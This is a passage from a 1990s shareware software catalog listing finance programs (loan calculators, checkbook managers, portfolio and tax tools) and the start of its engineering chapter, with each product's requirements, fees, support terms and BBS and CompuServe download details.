31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: HOMRF10A.ZIP on BBSs (multiple files) (call + 718-837-3236 to download it at no charge); HOMRF.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 4 (or contact userID + 74650,3623 for assistance). + SWREG#: 1718 + PsL#: 11237 + Download size: 552k (about 41 minutes with a 2400 baud modem) + Description: + Will refinancing save money? This caculates the acutal and + time value amount of savings or loss. Points may be + capitalized. Bonus calculators show alternative payment options + (any number of periods per year, payments in advance or + arrears) and amortization schedules with amounts for principal + and interest for the life of the loan and each year. Options + may be saved and printed. Mouse support, DOS GUI (graphical) + or text mode. Multiuser. + + + Product: LAPC - Loan Advisor for the PC + Author: , 518-482-5789 + Version: 2.3 (04-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 480k RAM; CGA monitor; + Hard disk; Epson printer. + Strongly recommended: VGA monitor; HP LaserJet printer. + Registration fee: $19.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, mail support; 1-month limited + return policy; bonus utilities; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products; + discounts on upgrades. 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Performs loan calculations for any type of fixed rate loan from + one to 50 yrs. It will calculate remaining principle, payoff + effect of principle prepayments and total interest charges. + LAPC is designed as a tool for loan management and for + + Chapter 8, "Finances" 345 + + + + comparing various loan parameters for choosing the best + alternative. + + + Product: Personal Finances 2 + Author: , 404-257-0187 + Version: 4.02h (01-12-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, newsletter, + mail support; all ASP-wide offers (see page 5); discounts on + other products; discounts on upgrades. 3-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: PF2-*.ZIP on BBSs (multiple files) (call 404-419-0888 + to download it at no charge); PF2.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 4 (or contact userID 73577,442 for + assistance). + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + A full function personal and small business financial system + for DOS. It supports all types of accounts-checking, credit + card, stock margin, etc. It has integrated subsystems for + multi-year budgeting, accounts pay/rcv, fixed assets/home + inventory, and financial investments. PF2 prints checks, works + with CheckFree, interfaces to TurboTax, imports stock quotes + from Prodigy, and imports Quicken .QIF files. Has on-line user + guide and extensive context sensitive help. Fully supported. + + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 352. + + Product: Total Investor for 1-2-3 DOS + Portfolio manager/technical analysis template. See full + description on page 339. + + Product: Total Investor for Symphony + Portfolio manager/technical analysis template. See full + description on page 340. + + Product: Variable Investment Analyst + Comprehensive investment portfolio management. See full + description on page 352. + + Product: WinCharging + Windows credit card manager. See full description on page 265. + + Chapter 8, "Finances" 346 + + + + 8.2.1 Finances & budgets + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 353. + + Product: Charging + Author: , 201-529-8318 + Version: 3.3 (09-05-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; MLRCRG.ZIP on CompuServe + in CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + Download size: 270k (about 20 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Lets you easily track your credit card expenditures and + payments. Tallies income tax expenses, home expenses, whatever + you want. Quickeys make data entry fast and easy. + + + Product: Financial Freedom + Author: , 407-951-2268 + Version: 2.0 (02-01-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 5); discounts on other + products. + Look for: FFREED.ZIP on BBSs; FFREED.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 72103,505 for + assistance). + Download size: 644k (about 48 minutes with a 2400 baud modem) + Description: + Features include management of checking and savings, budget + control, loan analysis and amortization, check printing, + automated account reconciliations and strong reporting options. + Very easy to use and is designed for individuals who are new to + Windows or finance management. + + Chapter 8, "Finances" 347 + + + + Product: Financial Freedom GOLD + Author: , 407-951-2268 + Version: 1.0 (03-30-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $24.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5); discounts on other products. + Look for: FFGOLD.ZIP on BBSs; FFGOLD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 72103,505 for + assistance). + Download size: 649k (about 48 minutes with a 2400 baud modem) + Description: + Features include unlimited bank accounts (checking, savings, + credit cards, etc.), automated account reconciliations, + budgeting, check printing, strong reporting options, bill- + reminder utility, password protection, loan analysis and + amortization, online help and much more! + + + Product: FPLAN-KWIK Financial&Retire Pln + Author: , 800-736-4920 + Version: 1.0 (06-14-94) + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Strongly recommended: CGA monitor; HP LaserJet printer; Mouse. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, mail support; all ASP- + wide offers (see page 5); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; KFPLAN.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 7 (or contact userID 70272,3655 + for assistance). + Download size: 625k (about 47 minutes with a 2400 baud modem) + Description: + Gives a quick analysis of any or all included financial + planning subjects: retirement, education funding, life + insurance, disability, estate preservation, etc. Has option for + US or international subjects/terms. Automatic install program. + Automatic save feature. Tutorial w/printable check-list. + Subject data guides for all items. Financial planning check-up + for suggestions & tips. Automatic insert of other subjects + relevant data in current input module. Quick & easy know & plan + your situation. + + Chapter 8, "Finances" 348 + + + + Product: Money Organizer + Author: , 310-832-6984 + Version: 2.0 (04-11-95) + Needs: IBM 80386, Windows 3.1 or better. SVGA monitor; Hard + disk; Mouse; VBRUN300.DLL. + Strongly recommended: Modem; XMS memory; math coprocessor. + Registration fee: $25.00 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 1800k (about 134 minutes with a 2400 baud modem) + Description: + Handles unlimited number of checking, savings, credit card, + loan, and personal accounts. Allows complete transactions + between accounts. Provides budgeting and maintains all + transactions by budget categories. Creates reports, compares + the actual transactions with your budgets and graphs the + results. Prints reports in any language including those + writing right-to-left like Hebrew. Stores personal data, phone + numbers, dials or pages. Tells you when something is due to + pay. + + + Product: PC-GL + General ledger. See full description on page 272. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 264. + + Product: QuickTax (tm) Planner/Estimator + Author: , 916-622-1886 + Version: 1.04 (10-27-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, mail support; royalty-free + runtime license; + Look for: QTAX04.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A super tax planner and estimator. Ideal for client + interviewing by tax professionals. All 1993 tax data. Get the + most from deductions, credits, IRA, savings plan, pension, + social security, capital gains, dividends, and interest. Get + filing status, dependencies, withholding allowances and + + Chapter 8, "Finances" 349 + + + + estimated payments right. Avoid overpayment, underpayment and + penalties. No confusing tax forms to wade through or + understand. Easy entry. Automatic prompts guide you through all + necessary entries. + + + 8.2.2 Checkbook managers + + Product: Checking + Author: , 201-529-8318 + Version: 3.3 (09-05-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; MLRCHK.ZIP on CompuServe + in CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + Download size: 365k (about 27 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Lets you keep your checkbook the way you always have. No + accounting and bookkeeping learning curve to conquer. Just + enter your records and it does the tedious parts, like keeping + the running balance, balancing the register, and totaling your + tax deductions at the end of the year. Data entry is easy + thanks to Quickeys. + + + Product: DJ-CHECK + Print checks on DeskJet printers. See full description on + page 88. + + Chapter 8, "Finances" 350 + + + + Product: EXPRESSCHECK + Author: , 206-788-0932 + Version: 4.04 (11-18-93) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $34.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: CHECK4.ZIP on BBSs (call 206-788-4008 to download it at + no charge); CHECK4.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 4 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Easy-to-use checkbook manager. Screens resemble actual checks, + deposit slips and automated teller machine panels. Split + transactions up to 5 ways with over 200 budget codes per + account. Up to 90 accounts. Reports can be printed to show + totals, monthly totals, average monthly budget code totals and + more. Combined accounts for more detailed reports. Print + checks on any check format. Bill reminder system, + reconciliation, activity log. + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 347. + + Product: QPACS + Author: , 815-455-6333 + Version: 3.3 (02-01-95) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; all ASP-wide offers + (see page 5); discounts on upgrades. + Look for: availability unknown on BBSs; QPAC33.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (or contact userID 72317,2073 for + assistance). + PsL#: 10133 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + Designed to provide financial management functions for + individuals and families. The following functions are + provided: checkbook entries for up to nine bank accounts; + check printing with a recurring check file; check registers; + budget entry and actual-to-budget reports; ability to record + and track assets, liabilities, and investments; net worth + + Chapter 8, "Finances" 351 + + + + calculation and printout; index card file and a household + inventory file. + + + 8.3 Portfolio management + + Product: Capital Gainz + Author: , 919-542-6117 + Version: 4.0 (06-01-95) + Needs: IBM PC, DOS 5.0 or better. 2048k RAM; Hard disk; XMS + memory. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; 2-month return policy; bonus utilities; discounts + on upgrades. + Look for: CGZ*.ZIP on BBSs (multiple files) (call 919-542-6611 to + download it at no charge); CGZ*.ZIP on CompuServe in CIS:INVFOR + forum LIBrary 9 (multiple files) (or contact userID 70431,132 + for assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Portfolio manager for small investors and investment managers. + Ideal for 'dollar-cost averaging' strategy. Record purchases, + sales, dividends, capital gains, splits. Calculate gain/loss, + IRR, & total return. View or print security information over + range of dates. Reinvest dividends, redistribute sale + proceeds. Execute sales using FIFO, LIFO, max gain/loss, ID, + average cost. Variety of reports including tax forms. Single + price entry updates all related securities. Bond discount/ + amortization. + + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 355. + + Product: THE FEELING'S MUTUAL-WINDOWS + Mutual fund database/financial planner. See full description + on page 342. + + Product: Loan Master + Complete loan accounting and tracking system. See full + description on page 270. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 264. + + Chapter 8, "Finances" 352 + + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 345. + + Product: Portfolio Manager + Author: , 360-681-2402 + Version: 5.3 (07-15-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Strongly recommended: VGA monitor; Epson printer. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, BBS, + CompuServe, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: P_MGR53.ZIP on BBSs (call 360-452-7681 to download it + at no charge); PMGR53.ZIP on CompuServe in CIS:INVEST forum + LIBrary 10 (or contact userID 73060,2370 for assistance). + Download size: 880k (about 66 minutes with a 2400 baud modem) + Description: + Tracks most market investments. It also can handle CD's, + savings, limited partnerships, etc. Can maintain up to 5 accts + in 1 portfolio to separate your records for an IRA, spousal + IRA, special purpose account, etc. Will measure portfolio + performance to meet long range goals. It computes ROI, + estimated and actual yields, and other analytical data. It's an + excellent tax preparation and planning tool. 23 reports. Share + selection on sales. Menu driven & mouse compatible. + + + Product: StockQuest + Stock price analyser, multi-dimensional. See full description + on page 339. + + Product: Total Investor for 1-2-3 Window + Portfolio management and charting for 1-2-3. See full + description on page 230. + + Chapter 8, "Finances" 353 + + + + Product: Variable Investment Analyst + Author: , 913-381-9109 + Version: 5.92 (04-01-95) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse; math coprocessor. + Registration fee: $15.00 + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, CompuServe, mail support; bonus data; all ASP-wide offers + (see page 5); disks of other shareware. Lifetime free + upgrading allowed. + Look for: VARIN592.ZIP on BBSs; VARINV.ZIP on CompuServe in + CIS:INVFORUM forum LIBrary 5 (or contact userID 76200,275 for + assistance). + SWREG#: 2579 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Calculates profit, capital gain, periodic, cumulative, and + average annual total return, internal rate of return (IRR), + buy/sell prices, and other statistics. Produces 12 types of + charts. Can import/export data. It is especially useful for + investments involving multiple cash flows, such as mutual + funds, 401k plans, annuities, and partnerships, but also is + helpful for stocks, bonds, bank accounts, CD's, etc. Has pull + down menus, dialog boxes, and mouse support. + + + Product: Wall Street Simulator - Windows + Learn how to trade and compete with others. See full + description on page 340. + + + 8.4 Financial calculators + + See also: Utilities, Desktop utilities, Calculators; + Spreadsheet applications; Business, Business utilities, Weights + & measurements. + + Chapter 8, "Finances" 354 + + + + Product: Amortz - Loan Schedules & More! + Author: , 206-845-2744 + Version: 1.60 (10-31-94) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, GEnie, mail support; + 1-month return policy; all ASP-wide offers (see page 5). + 12-month free upgrading allowed. + Look for: AMORTZ16.ZIP on BBSs (call 415-323-4398 to download it + at no charge); AMORTZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 5 (or contact userID 74040,533 for assistance); + AMORTZ16.ZIP on GEnie in IBMPC forum LIBrary 30. + SWREG#: 3711 + PsL#: 11660 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A very "user friendly" financial loan system designed to be + useful an understandable to everyone - from a CPA putting + together a multi-million dollar deal to a teenager trying to + swing that first car loan. It can calculate any of the loan + variables (principal, interest rate, payment amount, or number + of payments), immediately show loan totals, and then generate a + "payback" schedule which you can review on screen or send to + the printer for a "hardcopy" record of payments. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 342. + + Product: MathWiz + Author: , 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + + Chapter 8, "Finances" 355 + + + + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; MATHWZ.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 6 (or contact userID 76534,1166 + for assistance). + SWREG#: 6322 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Versatile, easy-to-use financial analyser and calculator. PV, + FV, IRR, periods, payback functions, spreadsheet-type input of + irregular cash flow, save and print functions, view and print + multi-term amortization tables, calendar date calculations, + paper tape, roll-back, cut & paste, trigonometry. Excellent + all-purpose analyser and calculator. + + + Product: OpenHome + Selling property qualification generator. See full description + on page 316. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 264. + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 345. + + Product: WinPrice + Picks best deal from any two choices. See full description on + page 356. + + + 8.5 Income tax preparation + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 352. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 293. + + + 8.6 Finance utilities + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 353. + + Product: Charging + The credit card manager. See full description on page 346. + + Chapter 8, "Finances" 356 + + + + Product: DDE Requester for Win3.x & NT + Author: , 41-62-260935 + Version: 1.01.00 (03-31-94) + Needs: IBM 80386, Windows 3.0 or better. VGA monitor; Hard disk; + Mouse; VBRUN300.DLL. + Strongly recommended: SVGA monitor; EMS memory; math + coprocessor. + Registration fee: Sfr75.00 (add Sfr12.00 for shipping to U.S. + addresses) (add Sfr12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 6 months of unlimited phone, fax, + CompuServe, mail support; site license; all ASP-wide offers + (see page 5); discounts on other products; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; DDEREQ.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 11 (or contact userID 100144,2552 + for assistance). + Download size: 1105k (about 82 minutes with a 2400 baud modem) + Description: + This program will record changes in DDE data through DDE links + e.g. price history can be recorded from Reuters 1000, or profit + & loss can be recorded from Excel and saved in Access v1.1 MDB + or delimeted textfile format. Many DDE links allowed. Unlimited + DDE sources. Can record multiple data items per DDE record + (bid, ask, etc). Records data in Access v1.1 MDB or delimeted + textfile format. Windows NT tested. Fully configurable and has + a totally automatic mode. Can even detect bad DDE data or + prices. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 342. + + Chapter 8, "Finances" 357 + + + + Product: WinPrice + Author: , 719-531-0403 + Version: 1.0 (02-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; disks of other shareware. 12-month free + upgrading allowed. + Look for: PRICE_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); PRICE.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 56k (about four minutes with a 2400 baud modem) + Description: + Selects the best pricing between two alternatives. No more + struggling with the "Is 1 liter of GummySlurp for $1.29 a + better buy than 1 gallon for $4.87 ?" issue!! Automatically + accounts for differences in the units used in the two cases and + will give its results in either metric or English units as + desired. Easy to use - educational for children. + + Chapter 9, "Engineering" 358 + + + + + + Chapter 9 + Engineering + + See also: Data, Engineering data; Graphics, CAD/CAM + applications. + + + 9.1 Civil engineering + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 360. + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 499. + + + 9.2 Electrical engineering + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 499. + + Product: INSTINDX + Author: , 704-568-9598 + Version: 1.0 (09-01-94) + Needs: IBM AT (80286), DOS 3.2 or better. 1000k RAM; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Strongly recommended: EMS memory; math coprocessor. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + phone, fax, BBS, CompuServe, mail support; 2-month return + policy; site license; bonus data; all ASP-wide offers (see + page 5); disks of other shareware. 12-month free upgrading + allowed. + Look for: CTJIII.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJIII.* on CompuServe in CIS:LEAP + forum LIBrary 4 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3479 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Relational instrument index that prints (4) index reports: I/O, + address, specs, and full index. Prints instrument, control & + safety valve, and gauge/thermometer data sheets + (specifications). Includes ESTIMATing, CONTROLS, PROCPARM, and + MEASVAR dbs. Linked by pop-up windows to ISA standards for + + Chapter 9, "Engineering" 359 + + + + developing Tags. Limited only by HD size. Menu driven, help at + all screens. Can be customized for complete project management. + + + Product: PC-ECAP + Author: , 609-875-5433 + Version: 3.01 (01-24-94) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hercules monitor; HP DeskJet + printer; HP LaserJet printer; Epson printer. + Registration fee: $99.00 (add $4.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 5). + 2-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: ECAP301.ZIP on BBSs (call 609-764-0812 to download it + at no charge); ECAP30.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 13 (or contact userID 72202,3043 for assistance). + PsL#: 10411 + Download size: 174k (about 13 minutes with a 2400 baud modem) + Description: + This easy-to-use linear circuit analysis program will calculate + gain, phase, group delay, impedance, VSWR, and return loss for + your circuits. Also calculates transient response for one of 8 + input waveforms. Completely menu driven. Can analyze circuits + with up to 90 nodes and 1000 components. Built in full screen + text editor with "Help". Full screen file selector. Plots high + res graphs on screen or on IBM/Epson-9/24 pin, HP LaserJet or + HP DeskJet printers. Even makes bipolar transistor models. + + + Product: RADIOSIM + Author: + Version: 3.0 (04-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor. + Strongly recommended: EGA monitor; Hard disk; math coprocessor. + Registration fee: $1,800.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, CompuServe, mail + support; 6-month return policy; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + + Chapter 9, "Engineering" 360 + + + + 12-month free upgrading allowed. 12 free update disk(s) sent + out. + Look for: RADSIM30.ZIP on BBSs; RADSIM.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 100337,622 for + assistance). + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + Simulates a digital/analog radioelectric link in presence of + distorsions and interferences. Technical domains: satellite + transmission, radiolinks, mobile radio, etc. 44 modules + (digital modem, filter, equalizer, TWT, etc.), with variable + parameters. On line contextual Help (120 screens). Typical + resolved problem: BER versus C/N as a function of power amp. + backoff and type/level of interferers Digital modulations: PSK, + OQPSK, QAM, FSK, MSK, etc. + + + 9.3 Industrial engineering + + Product: DXF Bill of Materials Generator + Bills of materials from AutoCAD DXF files. See full + description on page 368. + + + 9.4 Mechanical engineering + + Product: Beam Cookbook + Author: , 714-497-3952 + Version: 1.00 (10-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Epson printer. + Strongly recommended: EGA monitor; Mouse; EMS memory; math + coprocessor. + Registration fee: $59.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, CompuServe, mail support; 3-month return policy; all + ASP-wide offers (see page 5); discounts on upgrades. Prodigy + support. + Look for: BCKBK10.ZIP on BBSs; BCKBK.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 72760,76 for + assistance). + SWREG#: 4363 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Solves 2D beams with multiple supports, variable I, hinges, + moment connectors, concentrated loads, moments, uniform loads, + and ramp loads. Springs can be added to the supports, hinges, + and moment connectors. Forced deflection and slopes can be + defined at the supports. You can display or print input data, + reactions, boundary conditions, and beam values. You can also + + Chapter 9, "Engineering" 361 + + + + graphically display or print the beam and shear/moment/slope/ + diagrams. (520K min RAM) + + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 499. + + Product: J-Works + HVAC load calculation and sizing program. See full description + on page 308. + + Product: Steam Properties + Version: 1.0 (06-28-95) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; Mouse. + Registration fee: $60.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited CompuServe, mail support; all + ASP-wide offers (see page 5); discounts on upgrades. 1 free + update disk(s) sent out. + Look for: STEAM10*.ZIP on BBSs (multiple files); STEAM.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 13 (or contact userID + 100131,2557 for assistance). + SWREG#: 6376 + PsL#: 14093 + Download size: 530k (about 40 minutes with a 2400 baud modem) + Description: + A Windows application that calculates the properties of steam/ + water within a wide range of pressure and temprature. It may be + used for analyzing a number of energy conversion components + used in power plants, such as steam turbines, pumps, boilers + and heat exchangers. The accompanied help file "Thermodynamics + online help" gives a brief description of these components. + + Chapter 9, "Engineering" 362 + + + + Product: Water and Steam Properties + Author: + Version: 1.2 (08-12-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $40.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 5). + Look for: WASP12.ZIP on BBSs; WASP.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 13 (or contact userID 100100,2050 for + assistance). + SWREG#: 3263 + PsL#: 11376 + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Replaces and improves on printed steam tables by providing a + wider set of properties, eliminating need to interpolate, and + working in many different units. Will find the conditions for + known values of enthalpy, entropy or density. Has context + sensitive on-line help. + + It gives 15 point properties and 17 temperature and pressure + dependent properties for ice, water and steam. Most + correlations cover from -100 to 800 deg C and up to 1000 bar. + Calculated data points match published data very closely. + + + 9.5 Structural analysis + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 360. + + + 9.6 Surveying & cartography + + See also: Data, Mapping data; Graphics, Business applications, + Mapping/cartography. + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 499. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 508. + + Chapter 9, "Engineering" 363 + + + + Product: MapDraw + Author: , 610.640.0339 + Version: 2.0 (07-25-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $89.00 (add $3.50 for 